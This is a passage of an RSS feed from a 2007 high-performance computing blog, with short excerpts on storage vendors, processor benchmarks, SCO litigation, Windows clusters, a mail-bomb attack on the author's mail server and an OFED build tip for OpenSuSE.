      <title>Sun snags CFS/Lustre</title>
      <link>https://blog.scalability.org/2007/09/sun-snags-cfslustre/</link>
      <pubDate>Wed, 12 Sep 2007 15:19:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/sun-snags-cfslustre/</guid>
      <description>See this PR. Since HP, IBM, etc. all support Lustre on their systems (as does my $day job), this should prove to be interesting. Will they keep supporting it, or run away to pNFS? I suspect the latter.
Storage clusters are going into overdrive. Storage software is growing rapidly, especially the clustered software. Go figure.</description>
    </item>
    
    <item>
      <title>Core memory returns ...</title>
      <link>https://blog.scalability.org/2007/09/core-memory-returns/</link>
      <pubDate>Wed, 12 Sep 2007 01:22:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/core-memory-returns/</guid>
      <description>I saw this linked off of /.. Core memory returns, though this core memory is not using magnetization of cores, but motion of cores. Since this is mechanical, I wonder how they are going to protect against shocks sufficient to exceed the coefficient of static friction &amp;hellip; not to mention eigen-modes of the long racetrack wires. This should be fun to watch as it develops.</description>
    </item>
    
    <item>
      <title>I admit it ... I like Clovertown</title>
      <link>https://blog.scalability.org/2007/09/i-admit-it-i-like-clovertown/</link>
      <pubDate>Fri, 07 Sep 2007 15:47:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/i-admit-it-i-like-clovertown/</guid>
      <description>I have a desktop box here, 8 cores, 8 GB ram, using it for some development and testing. This is a nice box. Not expensive. Linux on it (OpenSuSE 10.2), and some disk (900GB). All it needs is a good graphics card and it is an awesome workstation. The graphics card I am using now is the motherboard adapter based unit. It is sweet to be doing compiles and simply type &amp;ldquo;make -j8&amp;rdquo; and have this puppy crank.</description>
    </item>
    
    <item>
      <title>NetApp sues Sun over patents in ZFS</title>
      <link>https://blog.scalability.org/2007/09/netapp-sues-sun-over-patents-in-zfs/</link>
      <pubDate>Thu, 06 Sep 2007 11:56:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/netapp-sues-sun-over-patents-in-zfs/</guid>
      <description>See this link . Not good for ZFS. A day after someone posted an amusing and somewhat contradictory set of reasons why they preferred Sun x4500 to JackRabbit (including the &amp;ldquo;if a RAID card fails you have to replace it, and this is bad&amp;rdquo; in close temporal proximity to &amp;ldquo;the SATA controller failed and we had to replace the motherboard&amp;rdquo;, with the first offered up as to why JackRabbit was not as good as x4500, and the second as to why x4500 was better &amp;hellip; you can read this amusing gem on the beowulf list if you wish &amp;hellip;) we see ZFS being attacked on patent grounds.</description>
    </item>
    
    <item>
      <title>Solaris v. Linux:  The &#34;I&#39;m not dead yet&#34; battle</title>
      <link>https://blog.scalability.org/2007/09/solaris-v-linux-the-im-not-dead-yet-battle/</link>
      <pubDate>Tue, 04 Sep 2007 13:37:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/solaris-v-linux-the-im-not-dead-yet-battle/</guid>
      <description>The market has largely converged on two OSes going forward. Unix demand and sales have been giving way, according to IDC and others, for the past few years. Linux has taken, and continues to take, market and mind share away from it. Most OEMs realize this. There was a legal battle over this; now we are waiting for the fat lady with the Viking hat to start belting out her tune.
And in a Monty Python-esque manner, one of the combatants says &amp;ldquo;I&amp;rsquo;m not dead yet, I think I will go for a walk&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>Whither Barcelona?  Well, here ...</title>
      <link>https://blog.scalability.org/2007/09/whither-barcelona-well-here/</link>
      <pubDate>Tue, 04 Sep 2007 13:07:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/whither-barcelona-well-here/</guid>
      <description>Barcelona vs Xeon. 2.0 GHz Barcelona vs 2.33 GHz Clovertown. Punchline: SpecFP 78 for Barcelona, 60 for Xeon. Must be an old video. Xeon 5345 is not the highest performing Xeon, that is the 5365 at 3 GHz. About 29% &amp;ldquo;faster&amp;rdquo; than the 2.33 GHz version. This should put the 3 GHz Xeon on performance parity with the 2GHz Barcelona. But the Barcelona has a better memory system. And a better internal processor &amp;ldquo;bus&amp;rdquo; (yeah, not a bus, but a fabric).</description>
    </item>
    
    <item>
      <title>IDC server numbers for most recent quarter/year</title>
      <link>https://blog.scalability.org/2007/08/idc-server-numbers-for-most-recent-quarteryear/</link>
      <pubDate>Fri, 24 Aug 2007 17:45:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/idc-server-numbers-for-most-recent-quarteryear/</guid>
      <description>This is useful in various contexts. We keep hearing from various quarters about how well they are doing, &amp;ldquo;beating&amp;rdquo; the competition. Well, at the end of the day, it&amp;rsquo;s what people do, not what they say, that matters. From Supercomputingonline:
Ok, let&amp;rsquo;s work a little math: $1.8B/$5.0B US is &amp;hellip; 0.36. That is, the newly purchased Linux server market is 36% the size of the newly purchased Windows server market, and growing.</description>
    </item>
    
    <item>
      <title>Sun to become Java?</title>
      <link>https://blog.scalability.org/2007/08/sun-to-become-java/</link>
      <pubDate>Fri, 24 Aug 2007 13:27:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/sun-to-become-java/</guid>
      <description>This morning, /. reports
      Ok, it&amp;rsquo;s not their name. Just their ticker symbol. But why? Well, their CEO says something here &amp;hellip;
[wipes monitor from spewed coffee] Quoting Inigo Montoya
      I make no bones about it: I think Java is massively overhyped and overblown. It is a solution looking for a problem from the previous decade, which really didn&amp;rsquo;t exist back then either. But today we are stuck with its 32 bit legacy.</description>
    </item>
    
    <item>
      <title>The future of HPC</title>
      <link>https://blog.scalability.org/2007/08/the-future-of-hpc/</link>
      <pubDate>Fri, 24 Aug 2007 04:34:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/the-future-of-hpc/</guid>
      <description>Some of us have been arguing for a while that the future of HPC is aSMP (asymmetric processing) or heterogeneous processing. Others have argued that the future is massive multicore. In the aSMP world view, there are camps forming between RC (reconfigurable computing) and GPU/Cell-like computing. Here is what is interesting. In an article just posted in HPCWire, an &amp;ldquo;anonymous&amp;rdquo; writer, who in the past has argued the vector case strenuously, makes an extremely good analysis of the issues in front of us.</description>
    </item>
    
    <item>
      <title>Tilera</title>
      <link>https://blog.scalability.org/2007/08/tilera/</link>
      <pubDate>Tue, 21 Aug 2007 16:06:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/tilera/</guid>
      <description>Over at Accelerated Times, an article was posted about the Tilera. Now I haven&amp;rsquo;t heard much about Tilera, other than pre-releases. [update: look at the comment here] The author focuses on several important aspects: the business model, the money raise, and whether they are where they say they are.
What strikes me is that if they raised a B-round, this usually &amp;hellip; usually happens post initial revenue, when you start to see interest and traction.</description>
    </item>
    
    <item>
      <title>A new blog</title>
      <link>https://blog.scalability.org/2007/08/a-new-blog/</link>
      <pubDate>Tue, 21 Aug 2007 15:18:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/a-new-blog/</guid>
      <description>Have a look at Accelerated Times.</description>
    </item>
    
    <item>
      <title>The fat lady is about to sing</title>
      <link>https://blog.scalability.org/2007/08/the-fat-lady-is-about-to-sing/</link>
      <pubDate>Tue, 21 Aug 2007 04:55:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/the-fat-lady-is-about-to-sing/</guid>
      <description>(relevance to HPC: some of the companies that effectively bankrolled this effort have been trying to leverage it against Linux, in the HPC space, and have managed to cause customer confusion &amp;hellip;) Can&amp;rsquo;t get any more cliché than that. /. links to an arstechnica article on SCO. Turns out the ruling knocked out any pillar of hope for this rapidly fading company. Their only real hope now is for a white knight.</description>
    </item>
    
    <item>
      <title>There are times when I ask myself why...</title>
      <link>https://blog.scalability.org/2007/08/there-are-times-when-i-ask-myself-why/</link>
      <pubDate>Tue, 21 Aug 2007 04:25:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/there-are-times-when-i-ask-myself-why/</guid>
      <description>This is a very short missive about Java. I am tired of the complete lack of official 64 bit support for Java in browsers. Then again, using Java in your browser is a pretty sure way to crash your browser. It certainly makes fast systems slow, and slow systems unusable. I think it is time we all took Nancy Reagan&amp;rsquo;s advice, and &amp;ldquo;just say no&amp;rdquo; to Java. It&amp;rsquo;s waaaaay past time.</description>
    </item>
    
    <item>
      <title>DragonFly ... pre pre alpha</title>
      <link>https://blog.scalability.org/2007/08/dragonfly-pre-pre-alpha/</link>
      <pubDate>Mon, 20 Aug 2007 23:38:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/dragonfly-pre-pre-alpha/</guid>
      <description>I mean really, pre pre pre &amp;hellip; pre alpha. Did I mention that it is pre pre pre &amp;hellip; pre alpha? Takes flight here. Still a ways to go. RIP SICE. Update: DragonFly is our next gen user interface for clusters. SICE is our previous gen, it had been around for years, and was long in the tooth. DragonFly will be dual licensed, and as soon as we get all the hooks together, we will release code.</description>
    </item>
    
    <item>
      <title>Acceleration meme</title>
      <link>https://blog.scalability.org/2007/08/acceleration-meme/</link>
      <pubDate>Mon, 20 Aug 2007 14:46:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/acceleration-meme/</guid>
      <description>Amir at Reconfigurable Computing Blog (welcome back Amir!) notes
      We have been making the arguments for (and pitching) accelerated computing for years. Almost half a decade. Scary. We see in other people&amp;rsquo;s marketing materials, pitches, etc. things we said years ago. In one particularly egregious example, a potential competitor had some of our slides in their online presentation. Makes you really love to deal with &amp;ldquo;no-NDA&amp;rdquo; VCs. I agree with Amir that the meme has been catching on for a while.</description>
    </item>
    
    <item>
      <title>The good, the bad, and the ugly</title>
      <link>https://blog.scalability.org/2007/08/the-good-the-bad-and-the-ugly/</link>
      <pubDate>Sat, 18 Aug 2007 22:32:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/the-good-the-bad-and-the-ugly/</guid>
      <description>Why do we blog, and why do we read blogs, and what does what we read and write say about who we are, what we think, and how we act? Robin at Storagemojo (great blog) talks about the nuances of corporate blogging, and shows some stuff from IBM on the policies of blogging, as well as some stuff from an informal EMC blogger. This is interesting, and as Robin points out, the IBM policy has a particularly valuable set of guidelines.</description>
    </item>
    
    <item>
      <title>buh-dee buh-dee  buh-dee ... dats all folks!</title>
      <link>https://blog.scalability.org/2007/08/buh-dee-buh-dee-buh-dee-dats-all-folks/</link>
      <pubDate>Sat, 11 Aug 2007 03:49:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/buh-dee-buh-dee-buh-dee-dats-all-folks/</guid>
      <description>(the above is an attempt at putting into text, what the character &amp;ldquo;Porky Pig&amp;rdquo; says when he wraps up a short cartoon) Apparently SCO is now, quite officially, down for the count, and the count has begun in earnest. According to PJ at Groklaw, we see
      That is almost all she wrote. The proverbial fat lady is warming up and will be coming on stage soon. SCO claimed that Linux infringed upon the code it claimed it owned, and that it was copied.</description>
    </item>
    
    <item>
      <title>A petaflop here, a petaflop there, and pretty soon you are talking about real supercomputing</title>
      <link>https://blog.scalability.org/2007/08/a-petaflop-here-a-petaflop-there-and-pretty-soon-you-are-talking-about-real-supercomputing/</link>
      <pubDate>Thu, 09 Aug 2007 04:15:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/a-petaflop-here-a-petaflop-there-and-pretty-soon-you-are-talking-about-real-supercomputing/</guid>
      <description>NSF formally announced their awards, which others had hinted at over the past few weeks. These machines will be &amp;ldquo;500x faster than today&amp;rsquo;s supercomputers&amp;rdquo;. How this will occur in 5 years is, well, not known. Moore&amp;rsquo;s law (if it holds) gives us an order of magnitude in 5.5 years or so. So that&amp;rsquo;s 50x faster than Moore&amp;rsquo;s-law-following units.
Your options here are a) make more of them, or b) make em faster.</description>
    </item>
    
    <item>
      <title>Why something other than windows is likely to win the desktops</title>
      <link>https://blog.scalability.org/2007/08/why-something-other-than-windows-is-likely-to-win-the-desktops/</link>
      <pubDate>Tue, 07 Aug 2007 22:31:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/why-something-other-than-windows-is-likely-to-win-the-desktops/</guid>
      <description>&amp;hellip; or how to bring a really fast desktop to its knees. I have desktop unit with Windows XP pro on it. It is my primary windows xp box. It is a nice 2+ GHz Athlon 64 with 1.5 GB ram. Pretty fast SATA disks. Single core, but quite fast. Or so I thought.
I like to listen to internet radio while I work. Helps drown out the server noise. So I have winamp in a corner, playing something at low volume.</description>
    </item>
    
    <item>
      <title>Counter-attacking DDoS: something that works</title>
      <link>https://blog.scalability.org/2007/08/counter-attacking-ddos-something-that-works/</link>
      <pubDate>Tue, 07 Aug 2007 15:25:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/counter-attacking-ddos-something-that-works/</guid>
      <description>Yesterday I told you that we were under a mail-bomb DDoS. Message rates of about 147 per minute. As our normal rate is 1-2 messages per minute, this was a 100x or more increase. Not against our normal domain name, but against one that we host. One that doesn&amp;rsquo;t have a web site. And has one email user. Obviously the people who did this are really, terribly smart. Oh yes. (keyboard dripping with sarcasm).</description>
    </item>
    
    <item>
      <title>I don&#39;t get it ... no really, I don&#39;t</title>
      <link>https://blog.scalability.org/2007/08/i-dont-get-it-no-really-i-dont/</link>
      <pubDate>Tue, 07 Aug 2007 02:57:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/i-dont-get-it-no-really-i-dont/</guid>
      <description>Why on earth would someone launch a DDoS against us (technically a domain we host)? It is in progress right now. Main attack vector is via email/spam bots. If anyone out there wants me to gather specific data on the attack, please let me know. Pretty good logging of most things here. According to my trusty mail meter, we have repelled something like 0.2M emails in one day. Ballpark of 145 messages per minute.</description>
    </item>
    
    <item>
      <title>Ya turns yer back fer justa minute ...</title>
      <link>https://blog.scalability.org/2007/08/ya-turns-yer-back-fer-justa-minute/</link>
      <pubDate>Mon, 06 Aug 2007 06:33:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/ya-turns-yer-back-fer-justa-minute/</guid>
      <description>[in his best Brooklyn accent] &amp;hellip; and stuff happens. /. linked to a story on supercomputing procurement. The article is in the New York Times, and it is worth a read.
Short version is that the procurement appears to have been decided 4 years in advance, and the NSF will give the DOE the machine. Well, this assumes that the reporting is in fact correct. My own experience with various media interactions tends to suggest that misquoting/rewording and semantic shift are the norm, not the exception.</description>
    </item>
    
    <item>
      <title>When kernel module builds (and installs) go (horribly) wrong</title>
      <link>https://blog.scalability.org/2007/08/when-kernel-module-builds-and-installs-go-horribly-wrong/</link>
      <pubDate>Fri, 03 Aug 2007 16:59:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/when-kernel-module-builds-and-installs-go-horribly-wrong/</guid>
      <description>Built a new 2.6.22.1 kernel. Testing it for many things. Looks good overall, though it broke a few things when I first built it. Had to get the latest subsystem patches. Ok. I decided to use this as &amp;ldquo;the&amp;rdquo; kernel for all we are working on. Dog-food it. Put it on my laptop as well. (BTW: if anyone out there knows how to force a driver into windows, I am trying to load the AHCI driver into XP, so I can switch the system into a much faster disk mode &amp;hellip; Dell likes loading it in ATA mode, and it is slower as a result &amp;hellip; worse, XP refuses to load the driver when presented with it &amp;hellip; I need to force this to happen &amp;hellip; pointers welcome &amp;hellip; might just have to reload XP, but I would prefer to avoid the pleasure of doing this &amp;hellip;.</description>
    </item>
    
    <item>
      <title>Mostly OT from HPC:  Wireless air cards</title>
      <link>https://blog.scalability.org/2007/07/mostly-ot-from-hpc-wireless-air-cards/</link>
      <pubDate>Wed, 01 Aug 2007 02:58:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/mostly-ot-from-hpc-wireless-air-cards/</guid>
      <description>I just picked up a Verizon Wireless PCMCIA air card to go with the new Dell laptop. The HPC connection comes from this being the unit I take with me on-site. The wireless card is a PCMCIA unit, the PC5750. It is basically a PCMCIA -&amp;gt; USB bridge for a modem. I installed the Verizon software in the Windows XP portion (didn&amp;rsquo;t check to see if it works in XP x64, which I had been still considering reloading).</description>
    </item>
    
    <item>
      <title>An omen, or a taste of things to come</title>
      <link>https://blog.scalability.org/2007/07/an-omen-or-a-taste-of-things-to-come/</link>
      <pubDate>Tue, 31 Jul 2007 03:53:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/an-omen-or-a-taste-of-things-to-come/</guid>
      <description>I got an interesting letter in the mail today. It was a somewhat &amp;hellip; well &amp;hellip; cheesy looking letter from the USPTO (US Patent and Trademark Office) indicating that a patent applied for 7 years ago was finally awarded. Patent number 7,249,357 if you are interested. I won&amp;rsquo;t comment on the substance of the patent. The group I worked with was absolutely top notch, and it was an honor to be associated with them.</description>
    </item>
    
    <item>
      <title>High user loads</title>
      <link>https://blog.scalability.org/2007/07/high-user-loads/</link>
      <pubDate>Wed, 25 Jul 2007 21:32:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/high-user-loads/</guid>
      <description>Sorry folks, huge demand for my cycles. Has effectively stopped me from having time to write the followup bits. Will do soon.</description>
    </item>
    
    <item>
      <title>TCO: The sorta kinda but not-really argument,  part 1 (the TCO study)</title>
      <link>https://blog.scalability.org/2007/07/tco-the-sorta-kinda-but-not-really-argument-part-1-the-tco-study/</link>
      <pubDate>Sat, 21 Jul 2007 20:52:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/tco-the-sorta-kinda-but-not-really-argument-part-1-the-tco-study/</guid>
      <description>One of the more annoying parts of writing stuff for consumption online is that, every now and then, someone with an agenda, a very obvious agenda, will go off with weak arguments. One of those weak arguments that we saw yesterday was TCO. Not that TCO is a minor concern, it is a real, significant concern for management. How much something costs in the end is a sorely needed datum for any enterprise, company, entity, to make rational and realistic decisions.</description>
    </item>
    
    <item>
      <title>Oh whatta day: the fisking</title>
      <link>https://blog.scalability.org/2007/07/oh-whatta-day-the-fisking/</link>
      <pubDate>Sat, 21 Jul 2007 03:35:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/oh-whatta-day-the-fisking/</guid>
      <description>Yesterday, I commented on a puff piece article on Windows CCS. Go ahead and read it, the article and the commentary. This morning, I saw a comment on this same article from John at InsideHpc.com. I disagreed with John&amp;rsquo;s premise, and wrote a long article discussing this. While I respect John, I do disagree with him. But I will do so respectfully. The rest of this article will be &amp;hellip; sarcastic &amp;hellip; flippant &amp;hellip; and I am going to fisk the fisking post that was derived from John&amp;rsquo;s on another site.</description>
    </item>
    
    <item>
      <title>Rumor:  Crosswalk is done</title>
      <link>https://blog.scalability.org/2007/07/rumor-crosswalk-is-done/</link>
      <pubDate>Fri, 20 Jul 2007 15:59:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/rumor-crosswalk-is-done/</guid>
      <description>Robin at Storagemojo (great blog, read it religiously) says he had heard a rumor. Yeah, I should invoke the 24 hour rule. If you are at Crosswalk, and it is still going, please let him (and me) know.
Robin makes a great point there
Well, ok, I take a little issue with it in that the performance driven folks now realize that stability is critical to performance. Scaling up on a bleeding edge is a sure way to have lots of down time.</description>
    </item>
    
    <item>
      <title>Will CCS dominate all?</title>
      <link>https://blog.scalability.org/2007/07/will-ccs-dominate-all/</link>
      <pubDate>Fri, 20 Jul 2007 12:58:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/will-ccs-dominate-all/</guid>
      <description>John West asks this question in a short article on HPCWire. In it he posits a few things. It is worth looking into them.
First, his title is provocative, &amp;ldquo;Windows CCS and the End of *nix in HPC&amp;rdquo;. Not that this is an issue, he needs to draw readers in. Second, he shows what he is interpreting to be the fundamental conflict, that is, between end users who just want to get things done, as typified in his quote from the person who bought a windows cluster, and Don Becker, who did a pretty good job of jump starting the industry.</description>
    </item>
    
    <item>
      <title>Yet another puff piece ...</title>
      <link>https://blog.scalability.org/2007/07/yet-another-puff-piece/</link>
      <pubDate>Thu, 19 Jul 2007 01:50:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/yet-another-puff-piece/</guid>
      <description>On windows clusters. They quote Don Becker, cluster illuminati, who made some quite pointed and correct observations. They quoted some marketing types from other organizations who don&amp;rsquo;t appear to be technical, and don&amp;rsquo;t grasp what &amp;ldquo;hard to install&amp;rdquo; actually means.
Aside from that, one of the least painful aspects of a cluster is &amp;ldquo;how hard it is to install&amp;rdquo;. The most painful is the cost of running it, specifically managing users and applications.</description>
    </item>
    
    <item>
      <title>Download 5 years of your life ...</title>
      <link>https://blog.scalability.org/2007/07/download-5-years-of-your-life/</link>
      <pubDate>Fri, 13 Jul 2007 01:44:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/download-5-years-of-your-life/</guid>
      <description>or mine as it turns out. Found this via a link from Google Scholar. I was looking for the HMMer acceleration paper, specifically to see if it had been cited, and found my thesis. The HPC connection has to do with the amount of simulation that went into the calculations. Way back in the good old days, 64 atom supercells took 1 week for 100 time steps on the machines we had (borrowed SGI R3000&amp;rsquo;s).</description>
    </item>
    
    <item>
      <title>Guide to getting OFED 1.2 to build on OpenSuSE</title>
      <link>https://blog.scalability.org/2007/07/guide-to-getting-ofed-12-to-build-on-opensuse/</link>
      <pubDate>Sun, 08 Jul 2007 14:24:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/guide-to-getting-ofed-12-to-build-on-opensuse/</guid>
      <description>Grab the tarball from the open fabrics alliance (or from here)
Grab the build_new.sh from here, place it in the OFED-1.2 directory as root on your machine, then:
mv /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h.original
ln -s /usr/include/linux/miscdevice.h /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h
Then run the build_new.sh. Voila. Works. Binary RPMs are here.</description>
    </item>
    
    <item>
      <title>gpt installs in OpenSuSE 10.2 ... grrrrrr</title>
      <link>https://blog.scalability.org/2007/07/gpt-installs-in-opensuse-102-grrrrrr/</link>
      <pubDate>Fri, 06 Jul 2007 00:42:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/gpt-installs-in-opensuse-102-grrrrrr/</guid>
      <description>Suppose you have an x86_64 box, I dunno, able to put 8+TB usable in 3U. Suppose you want to load OpenSuSE 10.2 on it. Suppose you want to keep the partitioning simple, and not do any fancy tricks to eke out another few percent of performance, so you build your RAID6 with 2 hot spares. Now you have this big hunk-a-chunk-a disk. Now install OpenSuSE 10.2 on it. After you are done you discover &amp;hellip;.</description>
    </item>
    
    <item>
      <title>More about adoption</title>
      <link>https://blog.scalability.org/2007/07/more-about-adoption/</link>
      <pubDate>Wed, 04 Jul 2007 00:54:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/more-about-adoption/</guid>
      <description>Again, coming back to this, adoption rates are critical. I appreciate Patrick&amp;rsquo;s point from post 306 that Microsoft doesn&amp;rsquo;t release this data. In reading around Ken Farmer&amp;rsquo;s excellent www.winhpc.org site (sister to his excellent www.linuxhpc.org site), I found a link to this article. I recommend reading the whole thing. Especially page 2. Here is a quote.
The next portion of that paragraph is not something I understand.
Uh, sure. Not clear on what this means.</description>
    </item>
    
    <item>
      <title>A storage question</title>
      <link>https://blog.scalability.org/2007/07/a-storage-question/</link>
      <pubDate>Wed, 04 Jul 2007 00:07:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/a-storage-question/</guid>
      <description>What would be &amp;ldquo;game changing&amp;rdquo; for you in your storage? That is, what would enable you to do things, or think of things in a completely different way if only X was true? What is X?
The reason I ask this is that in short order, the Seagate 1TB drives are going to be out. I want to know if anyone thinks that this density of drive is game changing. 1000 of these drives is 1PB.</description>
    </item>
    
    <item>
      <title>Developer Targeted Platforms</title>
      <link>https://blog.scalability.org/2007/07/developer-targeted-platforms/</link>
      <pubDate>Tue, 03 Jul 2007 23:54:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/developer-targeted-platforms/</guid>
      <description>As I have pointed out before, without real adoption data, it is hard to gauge whether customers are really interested in a particular platform. We know server adoption data for Linux with reasonable accuracy. At last glance it is large, and rapidly growing, outpacing both the market growth and its rivals&amp;rsquo; growth. This tends to have secondary effects; more on those in a moment.
We do not know desktop usage growth across the market in any detail.</description>
    </item>
    
    <item>
      <title>Still working on getting Tiburon out the door</title>
      <link>https://blog.scalability.org/2007/07/still-working-on-getting-tiburon-out-the-door/</link>
      <pubDate>Tue, 03 Jul 2007 04:59:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/still-working-on-getting-tiburon-out-the-door/</guid>
      <description>in beta form. Tiburon is the open source based framework we are using to load our clusters: computing and storage, and provide modular interfaces to manage the systems. Basically if you are deploying more than 2 nodes, or two JackRabbits, you should not, ever, have to load each system and configure it. This should be automated. But done so in an intelligent manner.
And this is where I am thinking that the compute job ASL might have an analog in a management ASL.</description>
    </item>
    
    <item>
      <title>Whither X-RAID (by Apple)</title>
      <link>https://blog.scalability.org/2007/07/whither-x-raid-by-apple/</link>
      <pubDate>Mon, 02 Jul 2007 00:05:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/whither-x-raid-by-apple/</guid>
      <description>We have had a number of discussions with customers on X-RAID and related systems from Apple. Apple pioneered good low cost storage. Wasn&amp;rsquo;t terribly fast, but it came in around $2-3/GB or so. Last I priced something out for a customer it was ballpark of $2.75/GB. FWIW: JackRabbit is in the low $1.x/GB. I haven&amp;rsquo;t heard much new about X-RAID recently. Then a blog I like reading had a post about iPhone.</description>
    </item>
    
    <item>
      <title>Why we are where we are in the VC world</title>
      <link>https://blog.scalability.org/2007/07/why-we-are-where-we-are-in-the-vc-world/</link>
      <pubDate>Sun, 01 Jul 2007 22:26:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/why-we-are-where-we-are-in-the-vc-world/</guid>
      <description>Marc Andreessen (you should have an idea who he is if you have used a web browser at some point in your life) has an excellent post on his blog discussing the &amp;ldquo;why we are here&amp;rdquo; situation. Specific to VC and their investments. Well worth a read. Between this and TheFunded, some overall good reading for prospective, current, and former entrepreneurs, wondering, aloud sometimes in blogs, WTF &amp;hellip;</description>
    </item>
    
    <item>
      <title>Dude ... I got a Dell ...</title>
      <link>https://blog.scalability.org/2007/07/dude-i-got-a-dell/</link>
      <pubDate>Sun, 01 Jul 2007 21:03:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/dude-i-got-a-dell/</guid>
      <description>laptop that is. Long story. Took me too long to make up my mind (more than 96 hours). At the end of the day the issue for me was not price but specific features, functionality, and performance. Yeah, so I am atypical.
The major contenders were IBM/Lenovo, HP, Dell, Alienware, Sager/Clevo, and one or two others. No, I did not give Apple a serious look. To be frank, I can&amp;rsquo;t stand OSX.</description>
    </item>
    
    <item>
      <title>ASLs as a meta-language for cluster jobs</title>
      <link>https://blog.scalability.org/2007/06/asls-as-a-meta-language-for-cluster-jobs/</link>
      <pubDate>Fri, 29 Jun 2007 14:52:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/asls-as-a-meta-language-for-cluster-jobs/</guid>
      <description>Short post. I was having a conversation on how to do some things on a cluster, and an idea was born. I&amp;rsquo;ll flesh it out a little more later on, but the gist is, can we create an application specific language (platform independent, for the hordes of windows cluster users in addition to the Linux cluster groups) to handle job flow? Right now, the vast majority of queuing systems launch shell scripts.</description>
    </item>
    
    <item>
      <title>Tech support in olden times</title>
      <link>https://blog.scalability.org/2007/06/tech-support-in-olden-times/</link>
      <pubDate>Fri, 29 Jun 2007 14:45:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/tech-support-in-olden-times/</guid>
      <description>Yeah, I have days like this too &amp;hellip;</description>
    </item>
    
    <item>
      <title>Nice site on VCs</title>
      <link>https://blog.scalability.org/2007/06/nice-site-on-vcs/</link>
      <pubDate>Thu, 28 Jun 2007 15:47:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/nice-site-on-vcs/</guid>
      <description>Have a look at TheFunded. Personally I think the current model of pitching one after another ad nauseam may be inefficient. Knowing what we are getting into ahead of time with VCs is helpful.
It&amp;rsquo;s a shame that there is no real disinterested systematic vetting of business plans such that we can create a more efficient market for capital, by providing well vetted/organized/thought out business plans, and a relevant group of good VCs.</description>
    </item>
    
    <item>
      <title>Experimental change</title>
      <link>https://blog.scalability.org/2007/06/experimental-change/</link>
      <pubDate>Thu, 28 Jun 2007 12:21:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/experimental-change/</guid>
      <description>Turned required registration off for comments. I want to see if our spam filters will stop the spam before it gets posted. If any shows up, it will be deleted. I want this blog to be open and bidirectional. I don&amp;rsquo;t want it to become a repository for suppository advertising. If it works, we will keep it this way. If it doesn&amp;rsquo;t we will revert to registration for comments. This has little to do with our gentle and numerous readers, it has more to do with whether or not we have the abusers appropriately fenced off.</description>
    </item>
    
    <item>
      <title>Ethics and blogging</title>
      <link>https://blog.scalability.org/2007/06/ethics-and-blogging/</link>
      <pubDate>Thu, 28 Jun 2007 12:13:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/ethics-and-blogging/</guid>
      <description>Saw this article linked from /. In it there was an indication that Microsoft paid some bloggers to write up stuff which later became quotes. Bloggers got income, Microsoft got to leverage their quotes and their names. But is this ethical?
First off, Scalability.org is not an ad-supported site. We don&amp;rsquo;t run ads. We have pretty good traffic for a small blog, but this is not anyone&amp;rsquo;s day job. The only thing it really costs me is time, and it is pretty minimal in the bigger scheme of things.</description>
    </item>
    
    <item>
      <title>Good news on JackRabbit front</title>
      <link>https://blog.scalability.org/2007/06/good-news-on-jackrabbit-front/</link>
      <pubDate>Thu, 28 Jun 2007 04:53:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/good-news-on-jackrabbit-front/</guid>
      <description>The day job has signed up with an excellent partner to help grow the market for reliable and fast HPC storage servers. We have two partners in the US, one in India, and we are still working on the EU &amp;hellip; Update: Working with them on fixing the pricing, it appears to be off. Thanks for letting me know.</description>
    </item>
    
    <item>
